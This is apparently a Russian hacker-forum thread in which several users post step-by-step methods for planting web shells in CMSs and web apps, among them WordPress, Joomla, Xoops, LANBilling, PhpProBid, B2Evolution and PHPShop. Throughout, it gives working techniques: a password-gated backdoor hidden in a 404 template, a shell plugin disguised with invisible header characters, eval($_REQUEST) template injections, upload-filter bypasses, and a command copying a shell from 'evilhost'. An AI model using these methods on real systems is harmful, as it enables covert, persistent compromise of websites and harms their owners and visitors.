Заливка шелла в CMS

[HACKERSMARSA]

Заливка шелла в CMS "2z project".
Требования: Аккаунт администратора
Переходим в панель управления (http://localhost/2zproject1/2z/admin.php?mod=configuration) и нажимаем на вкладку "файлы"
В список разрешенных расишерний файлов добавляем php
zip, rar, gz, tgz, bz2, php
Если нужно,ниже ставим размер подходящий для нашего шелла.
Далее добавляем новость из админки (http://localhost/2zproject1/2z/admin.php?mod=addnews)
Нажимаем "вставить файл",выбираем наш шелл и загружаем
смотрим в списке файлов (http://localhost/2zproject1/2z/admin.php?mod=files)
там должен быть наш шелл,сам шелл после загрузки на сервер будет доступен по адрессу:
http://localhost/2zproject1/uploads/files/default/image.php

[NickStone]

В цикле сообщений буду писать о актуальных способах заливки веб-шелла на WP, а так же наработок к последней версии(3.4.2) и ниже.

1. WordPress <=3.4.2 заливка веб-шелла через "редактор файлов":
Требование: Права администратора блога, доступ в администраторскую панель блога
Инструкция:
Для начала нам нужно перейти в редактор файлов. Сделать вы это можете, либо перейдя по адресу "/wp-admin/theme-editor.php", либо в меню "Внешний вид -> Редактор":

В правой стороне сайта, перед вами будет блистать кликабельные ссылки на редактирование шаблонов/файлов сайта. Соответственно наша цель редактировать любой из файлов так, чтобы на сайте это ни как не отразилось, для этого мы будем использовать шаблон ошибки 404 (404.php).
Наверное, у вас должен возникнуть вопрос, как это можно назвать безпалевным редактированием, ведь не кто не отменял изменение ссылки или удаление поста, что привело бы к выводу этого самого файла. Да вы правы, мы можем очень крупно пожелеть если при каждом переходе на несуществующую страницу пользователь будет видеть наш шелл, чтобы этого избежать мы введем GET переменную, можете назвать ее паролем, она будет проводником к нашему шеллу, если этой переменной не будет, то пользователь будет смотреть на родную страницу 404 ошибки. Пишем такой вот код:

PHP код:

if(!isset($_GET['password'])) {
    // код шаблона 404 ошибки, который был в этом файле изначально
} else {
    // код нашего шелла
} 


Соответственно заменяем комментарии в коде, например на тот же wso, и получаем шелл.


2. WordPress <=3.4.2 заливка веб-шелла через "редактор плагинов":
Требование: Права администратора блога, доступ в администраторскую панель блога
Инструкция:
Для начала нам нужно перейти в редактор файлов. Сделать вы это можете, либо перейдя по адресу "/wp-admin/theme-editor.php", либо в меню "Плагины -> Добавить новый":

Смысл этого способы прост - Вам нужно загрузить новый плагин через форму в zip формате. Здесь есть два решения, либо вы берете и вставляете ваш шелл файл в любой из уже существующих плагинов, либо же вы создаете свой плагин и херачить туда шелл. И тот и этот вариант индентичны, но мне кажется интерснее было бы создать свой - шелл плагин! :-) Для этого вам нужно создать папку, например с названием "shell", поместисть в нее файл с вашим шеллом, и в самый вверх этого "плгина" вставить код:

PHP код:

/* 
    Plugin Name:*****   
    Plugin URI:*****    
    Description:****    
    Author:***     
    Version:***      
*/ 


Здесь перед вами встает два пути: написать ложную информацию в эти строки, типа "Plugin Name: Social share". и т.п., либо сделать эту информацию невидимой, как пример:

Здесь, вы видите установленный плагин без инфы - наш шелл, но вот в чем подвох, если просто эту информацию в исходнике плагинов не заполнять или заполнить пробелами, то WP это распознает и не даст загрузится плагинов. Здесь нам на помощь приходят стандартный набор программ в WIN, "таблица символов" (Меня Пуск -> Стандартные -> Служебные), там ищем пустой знак:

Копируем его там, и вставляем несколько раз как инфу в плагине(исходнике) и получаем шелл. Кстати если делать как мы сейчас (создаем свой плагин), и не будем прикреплять наш плагин к к какой-то части сайта (пример, wp_footer()), то мы увидем вот такую вещь в администраторской панели:

Отсюда два пути, либо быстро залить шелл в другую диру, и потом тупо к нему обращаться, либо же прикреплять шелл к какой то части сайта (добавлять в фильтр), тогда такого мы не увидим.

[BigBear]

LANBilling

Сайт разработчиков - _ttp://www.lanbilling.ru

1 способ (нашёл ReVOLVeR)

Цитата:

1)создаем новый шаблон "Отчетов"
2)в нем свой шелл
3)поставим этот шаблон дефолтным
4)генеририруем отчет.

*Отчет инклудит в себя шаблон.Получаем шелл.

Конфиги к бд в /etc/billing.conf

2 способ найденный мной

Цитата:

1) Цепляемся в админку
2) Переходим в Шаблоны документов
3) льём шелл без ограничений (расширения php, php3, phtml и тд и тп)
4) Заходим в созданный шаблон. При наведении на созданный файл видим что-то вроде javascript:EditTemplate(№)
5) Обращаемся к шеллу напрямую используя его серийный номер и расширение.

Например
http://site/admin/templates/tmpl_№.php
http://site/admin/templates/tmpl_№.phtml

смотря от расширения.

Проверено на версии 1.8

Возможно сработает и на других версиях.

[ReV]

Видео показывающее процесс заливки в LANBilling 1.8
Методом описанным выше.
_ttp://priv8.ru/3.webm

[faza02]

Xoops
Идем в админку -> Модули -> Система -> Шаблоны -> Выбираем текущий шаблон -> theme.html.
В него можно вставить php-код между тегами <{php}> evil($_GET[e]); <{/php}>

© Ereee

[banana]

Цитата:

Сообщение от Ctacok

Joomla.
1001 способ
Нужны права админа.
Идём в Extensions -> Install/Uninstall

Нас интересует поле:
Install from URL (Тоже самое и с upload packade file (Ручная заливка))
Вбиваем туда http://your_site.com/dir/shell.php
shell.php обязательно должен быть в text/plain и с расширением .php
Жмём install.
Получаем ошибку :

Да нам всё равно как-то, идём /tmp/shell.php
Спасибо за внимание.

PHP код:

function _getPackageFromUrl()
    {
        // Get a database connector
        $db = & JFactory::getDBO();

        // Get the URL of the package to install
        $url = JRequest::getString('install_url');

        // Did you give us a URL?
        if (!$url) {
            JError::raiseWarning('SOME_ERROR_CODE', JText::_('Please enter a URL'));
            return false;
        }

        // Download the package at the URL given
        $p_file = JInstallerHelper::downloadPackage($url);

        // Was the package downloaded?
        if (!$p_file) {
            JError::raiseWarning('SOME_ERROR_CODE', JText::_('Invalid URL'));
            return false;
        }

        $config =& JFactory::getConfig();
        $tmp_dest     = $config->getValue('config.tmp_path');

        // Unpack the downloaded package file
        $package = JInstallerHelper::unpack($tmp_dest.DS.$p_file);

        return $package;
    } 


Уязвимость присутствует из-за того, когда файл помещается в tmp, он по окончанию установки (ошибки) не удаляется.

Когда нет загрузчика, а льется через Upload Package File, шелл также помещается в tmp. Тестировано на 1.5.26.

[nemaniak]

PhpProBid v. 6.10
Оф. сайт: phpprobid.com
Нужны права админа.

Способ №1:
- Заходим в админку, далее Categories -> Edit Category Language Files (Категории -> Редактировать файлы языков категорий);
- Выбираем язык для редактирования, очень желательно не текущий;
- В правой колонке правим php файл языка, вставляем свой код, сохраняем изменения и сверху видим сообщение о успешности и путь файла языка;
- Переходим по вышеуказанному пути и видим исполнение кода.

Способ №2: (Работает не всегда)
- Опять же в админке, переходим в General Settings -> Digital Downloads (Основные настройки -> Цифровые загрузки):
- Ставим галку в Enable Digital Downloads и выставляем в Maximum file size 1000000 KBytes, сохраняем;
- Далее заходим от лица любого юзера в Users Management -> Login as Site User (Управление пользователями -> Войти как пользователь сайта) и создаем новый аукцион;
- Заполняем все поля и жмем Next step;
- Теперь опускаемся вниз к пункту Digital Goods и загружаем свой файл;
- Теперь нужно узнать номер аукциона, это можно сделать, как отследив снифером Post данные и глянув в переменную item_id, так и, например, дойти до Preview и узнать номер в Auction ID;
- Наш шелл будет лежать по следующему пути site.com/dd_folder/dd_A_[номер аукциона]_[название файла].img, например, site.com/dd_folder/dd_A_100006_shell.php.img, причем при переходе на него шелл исполняется за счет предрасширения php.

[nemaniak]

B2Evolution <= 2.4.6 (Возможно и более поздние версии)
Оф. сайт: b2evolution.net
Нужны права админа.

- В админке переходим сразу в раздел Upload (в верхнем меню);
- Если попробуем загрузить php (php3, php4 и т.д.), то система нам любезно ответит, что загрузка данного типа файлов запрещена. Переименовываем наш злоскрипт в картинку, что-то типо test.jpg и грузим;
- Переименовываем картинку обратно в файл с расширением php с помощью Rename в разделе Actions, на это нам система молчит;
- Грузим файл напрямую, он будет по след. пути http://site.com/blogs/media/users/[имя админа]/test.php, например, http://site.com/blogs/media/users/admintest/test.php.

[Take_IT]

PHPShop & PHPShop CMS Free - Latest Version

Developers - phpshop.ru , cms.phpshopcms.ru
Need: Admin Access
Admin url: /phpshop/admpanel/

Заходим в редактор .tpl шаблонов. Выбираем тему с шаблоном которой будем работать, можно выбрать текущую тему, например "gray"

Выбираем файл шаблона, например файл шаблона для главной страницы "main/index.tpl"

Внедряем свой код

PHP код:

@php
eval($_REQUEST[e]);
php@ 


Смотрим абсолютный путь:

Код:

localhost/?e=phpinfo();

Льем шелл:

Код:

localhost/?e=copy("evilhost/shell.txt","/home/yoursite/phpshop/templates/gray/main/shell.php");

Asterix CMS

Developers - asterix.opendev.ru
Need: Admin Access
Admin url: localhost/admin.html

Шелл с расширением .PHP спокойно заливается через любую форму аплоада картинок, а также через встроенный текстовый редактор CKEditor

[}{оттабыч]

Mojomor 1.2.1
http://ellislab.com/mojomotor
проприетарный двиг, вобщем по дефолту можно лить любой файл с редактора CKEditor 3.6.3 (который вкручен в двиг!).

В контролере Editor екшн Upload()

PHP код:

...if ($upload_settings['allowed_types'] == 'all')
        {
            $config['allowed_types'] = '*';
        }
        else
        {
            // jpg are sometimes "jpe" or "jpeg" so allow those also
            $config['allowed_types'] = 'gif|png|jpg|jpeg|jpe';
        }... 


В бд в таблице mojo_upload_prefs allowed_types как раз All

ps для управление контентом нужны права